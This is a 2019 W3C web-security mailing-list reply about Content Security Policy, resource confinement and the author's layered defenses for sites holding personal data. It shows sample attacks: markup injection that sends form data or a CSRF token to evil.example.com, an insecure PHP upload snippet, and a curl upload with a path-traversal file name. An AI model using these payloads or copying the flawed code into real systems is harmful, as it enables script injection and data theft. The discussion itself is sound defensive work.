
Re: A modest content security proposal.

From: Craig Francis <craig.francis@gmail.com>
Date: Thu, 18 Jul 2019 14:03:22 +0100
Message-Id: <D30318B4-B53F-4E3C-85D1-7B49D294B165@gmail.com>
Cc: Web Application Security Working Group <public-webappsec@w3.org>
To: Mike West <mkwst@google.com>
On 16 Jul 2019, at 11:54, Mike West <mkwst@google.com> wrote:

> Thanks for your feedback! I'll concentrate on the resource confinement feedback, as it's the part I've thought least about, and I'd like to understand your perspective!



Thanks for trying to make these problems easier to solve.

Replies about Resource Confinement below...




> On Mon, Jul 15, 2019 at 2:15 PM Craig Francis <craig.francis@gmail.com> wrote:
> The bit I feel like I'm missing, and it might be because I enjoy applying multiple layers of protection, is the Resource Confinement side.
> 
> On my websites, I have a folder for static resources (`php_admin_flag engine off`), that's under version control, replaced every time the website is updated (with a diff check before), and it's not writable to by the web server process (so no user uploaded/replaced content) - I like to ensure that all JS/CSS/Images/Fonts are loaded from that safe folder, and I can do that because the CSP specifies specific paths that are served from that locked-down folder.
> 
> It's certainly _possible_ to construct a path-limited policy like this today. As far as I can tell, no one does this at any scale, as it's quite brittle and requires close coordination between teams responsible for different bits of a site. Likewise, the fact that we drop the path after a cross-origin redirect significantly weakens the guarantees we can provide.
> 
> I agree that a pathless proposal is strictly less powerful than CSP, but it seems like a reasonable place to start, given that that's what sites generally seem to have landed on after a few years of experience with CSP.



Dropbox does, e.g. 

    script-src ... https://www.dropbox.com/static/compiled/js/ ...

I'll describe my setup below, but in summary: while the initial setup took a few days, I was able to start with hostname-only rules, then switch to path-based restrictions one directive at a time.

And once the paths were set up, maintenance has been really easy (especially if the tooling exists to easily add paths to the CSP).



> A possible solution would be a second domain, but that would slow the page load time a little bit, make the server config a bit more complex, and might lose some restrictions - such as the user-uploaded images folder containing a malicious JavaScript file (will I need a different domain for each resource type?).
> 
> I'm curious about the value you see here. It seems that script injection is cleanly dealt with via the `scripting-policy` bits, and any protection you're getting from confinement is additive. It can absolutely reduce risk even further, but it's not clear to me that there's much value in preventing script execution above and beyond pointing only to servers that you trust?


My "trusted" server has a folder for user uploaded content, and I always see that as relatively dangerous.

So I want to be able to tell the browser things like: only on this page can you get images from that folder.

This is useful if the nonce protection is broken - similar to how a single firewall that protects a company network is not considered enough (while it solves most inbound network issues, we assume it could be bypassed).
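As a sketch of what I mean (hostnames and paths here are hypothetical, and the header is wrapped for readability), a page that only needs images from the uploads folder might get:

```http
Content-Security-Policy: default-src 'none';
    script-src https://example.com/static/js/;
    style-src https://example.com/static/css/;
    img-src https://example.com/uploads/
```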



> I also dynamically set the CSP for every page - e.g. most pages are ok with `connect-src 'none'` (from default-src), but when a page/script needs to use XMLHttpRequest, then I explicitly set the full URL for the 1 API it needs to access.
> 
> This is a lot of work! :)


Depends on the website... for my websites, it's only ~25 lines :-)



> The intention is to have layers... 1. my server side code shouldn't have any XSS vulnerabilities; if it does, 2. CSP should stop the loading of scripts; if that fails (e.g. a legitimate script was replaced by a hacker), 3. that script should be limited in what it can do to that page.
> 
> Nothing in this proposal (or CSP) limits the capability of a script to modify a given page. They both seem to limit the ability of a script to pull in resources, and potentially to exfiltrate data.


True, modifying the current page isn't great, and I don't think there is a way to stop that.

It does limit the script's ability to get information and then apply modifications based on it, or to pull in even more resources (e.g. a crypto miner).

But if that page contains sensitive data (e.g. information about someone's disabilities), I want to do everything I can to stop that data getting out.

Admittedly I'm sure there are still ways of exfiltrating, but my current CSP should make it difficult if the attacker has *only* managed to get JavaScript execution.

That's what I would like Resource Confinement to focus on... let's say the nonce-based XSS mitigation has failed; what now? Do we just let the malicious JS do whatever it wants?



> This also applies to limiting what content can be loaded in frames (e.g. blocking an iframe from showing a malicious login form, which is why I have frame-src 'none' for most pages).
> 
> Presumably we'd add some sort of `frames` category to `Confinement-Policy` to support this specific thing. 


That would be good.



> And finally, some DOM messing around can cause issues:
> 
>    <form action="https://evil.example.com">
>    <form action="./">
>       <input name="password" />
>    </form>
> 
>    <img src='https://evil.example.com<form action="./"><input name="csrf" value="abc123" />...' />...
> 
> These are indeed problems (along with the rest of http://lcamtuf.coredump.cx/postxss/).


I'm fairly sure that's where I first saw those problems... but thanks to the path-based CSP restrictions I've been able to add, I think I've got those issues covered as well (via form-action, img-src, and other directives).
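For what it's worth, the directives doing the work against those post-XSS tricks look something like this in my setup (hypothetical paths, wrapped for readability):

```http
Content-Security-Policy: default-src 'none';
    form-action https://example.com/account/;
    img-src https://example.com/static/img/
```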



> Maybe introduce Scripting-Policy first; then deprecate the old/un-necessary parts of CSP, but still keep CSP around with a focus on Resource Confinement?
> 
> `Scripting-Policy` is the bit I'm most interested in, to be sure. I'm interested in `Confinement-Policy` mostly as a way to support the belt-and-suspenders approach noted in https://csp.withgoogle.com/docs/faq.html#strict-dynamic-with-whitelists.
> 
> I think it will be difficult to use `Scripting-Policy` with CSP's `script-src` directive (or, at least, I'd consider it a non-goal to make that interaction simple and easy). If we're going to run in this direction, I'd prefer to just do one thing. Obviously we wouldn't dump CSP tomorrow, but I don't think keeping both around forever is a reasonable plan.



That's a good example.

The `Scripting-Policy` header should be the developer's first and main focus, and I think it would help mitigate *most* of the XSS problems.

But I'd still like to apply strict Resource Confinement.

Maybe the recommendation to developers should be that the CSP header is added by websites that want/need to apply those extra restrictions?

I think the current CSP syntax works well for that: it already gives you host-based restrictions, it already allows you to add path restrictions, and it does both per resource type.

Doing the nonce part separately, and deprecating things which aren't needed any more, will leave a fairly good Confinement-Policy.


---


As to the websites I build, this is perhaps going a bit off topic, but might be useful...

They average ~75,000 lines of code.

They mostly deal with reports, customer/student data, invoices, time sheets, etc.

Nothing particularly exciting, mostly simple forms, but those pages hold very sensitive/personal data, so I'm really interested in keeping that safe.

The current CSP is created dynamically for every page.

I start with `default-src 'none'`.

I add a few base rules - like the paths to my static CSS/JS folders.

Then, whenever I need an exception, like JS needing to use an API, I just need to add something like:

    $response->csp_source_add('connect-src', '/api/clipboard/');

If I don't do this, it won't work, which is kind of noticeable when building new features :-)
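As a sketch of what that helper could look like (the class here is hypothetical, written to match the call above rather than any real library):

```php
<?php

// Hypothetical per-page CSP builder: start with everything blocked,
// and let each page add only the exceptions it needs.
class Response {

    private $csp = ['default-src' => ["'none'"]];

    public function csp_source_add($directive, $source) {
        $this->csp[$directive][] = $source;
    }

    public function csp_header_get() {
        $parts = [];
        foreach ($this->csp as $directive => $sources) {
            $parts[] = $directive . ' ' . implode(' ', $sources);
        }
        return implode('; ', $parts); // sent via header('Content-Security-Policy: ...')
    }

}

$response = new Response();
$response->csp_source_add('script-src', 'https://example.com/static/js/');
$response->csp_source_add('connect-src', '/api/clipboard/');
```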

I think this is why I enjoy working with CSP: it allows me to be as restrictive as I want to be (the current proposal unfortunately drops most of those restrictions).

And I'm looking forward to being able to set a baseline and fallback CSP via Origin-Policy (the baseline will probably be host only, and I'm wondering if the fallback could simply be 'none').

Unfortunately I do have to accept user uploaded content, and I see this as very dangerous.

For example, on a poorly created website you might find something like:

    move_uploaded_file(
        $_FILES['image']['tmp_name'],
        '/www/public/uploads/' . $_FILES['image']['name']);

The intention is to keep the name of the uploaded file (e.g. "sunset.jpg" or "evil.js"), which is a bad idea.

The attacker could also set the file name to "../js/jquery.js" to replace a JS file that receives a nonce - so the attacker now has script execution on any page that includes that jquery.js file.

    curl -F 'image=@/tmp/evil.js;filename=../js/jquery.js' https://...

Technically this attack won't actually work in PHP, as it strips everything before and including the last "/" - but that's relying on a safety feature that not all programming languages have.

This is why I make sure the web-server process can only write to certain folders (with a script that checks every night), so it ensures something running under the "www-data" account cannot replace my JS files.

I also rename files during the upload process (based on the record id), and re-save images in a known-good file format (just in case the image contains something malicious that could exploit a browser's rendering process).
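A minimal sketch of that renaming step (the paths and field names here are hypothetical, and the image re-saving is omitted): the client-supplied file name is ignored completely, so a name like "../js/jquery.js" has nothing to attack.

```php
<?php

// Hypothetical renaming step: the stored name comes from the database
// record id alone; the client-supplied name is never used.
function upload_path($record_id) {
    return '/www/private/uploads/' . intval($record_id) . '.jpg';
}

// At upload time (after the record is inserted and the image re-saved):
// move_uploaded_file($_FILES['image']['tmp_name'], upload_path($record_id));
```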

And even more off on a tangent: if someone did find a way to create a ".js" file in the uploads folder, I've set up Apache to set a mime type of "application/octet-stream", nosniff, and Content-Disposition attachment for any files not matching "\.(?i:gif|jpe?g|png)$".
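A sketch of that Apache config (not my exact setup; assumes mod_headers is enabled and the paths are hypothetical):

```apache
# In the uploads folder, anything that isn't a known image type
# is served as an opaque download.
<Directory "/www/public/uploads">
    ForceType application/octet-stream
    Header set X-Content-Type-Options "nosniff"
    Header set Content-Disposition "attachment"
    <FilesMatch "\.(?i:gif|jpe?g|png)$">
        ForceType None
        Header unset Content-Disposition
    </FilesMatch>
</Directory>
```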

Recently I've updated my sites so the <head> starts with the <script> tags (async, with integrity), then immediately follows up with:

    <meta http-equiv="Content-Security-Policy" content="script-src 'none'" />

I skip this for Edge (as it has a few issues), but it means that no <script> tags will be allowed later in the HTML (even if an XSS attack tried to include a script that is valid elsewhere).

My next step is to use paths for `form-action`, which is one of my last uses of 'self'.

That said, I already have a CSRF token check that's hashed with the form action (so changing the form action will fail the CSRF checks). And since I have a common bit of code that creates the <form> tags for all of my websites, it could add the action to the CSP header automatically (I'm hoping that's about 3 lines of code for all sites, but I need to check first).
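A minimal sketch of that action-bound token (function names and the key source are hypothetical): if injected markup changes the form action, the submitted token no longer verifies.

```php
<?php

// Hypothetical CSRF token tied to the form action: the token is an HMAC
// of the action, keyed with a per-session secret.
function csrf_token($session_key, $form_action) {
    return hash_hmac('sha256', $form_action, $session_key);
}

function csrf_check($session_key, $form_action, $token) {
    return hash_equals(csrf_token($session_key, $form_action), $token);
}
```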

Thanks,
Craig
Received on Thursday, 18 July 2019 13:03:49 UTC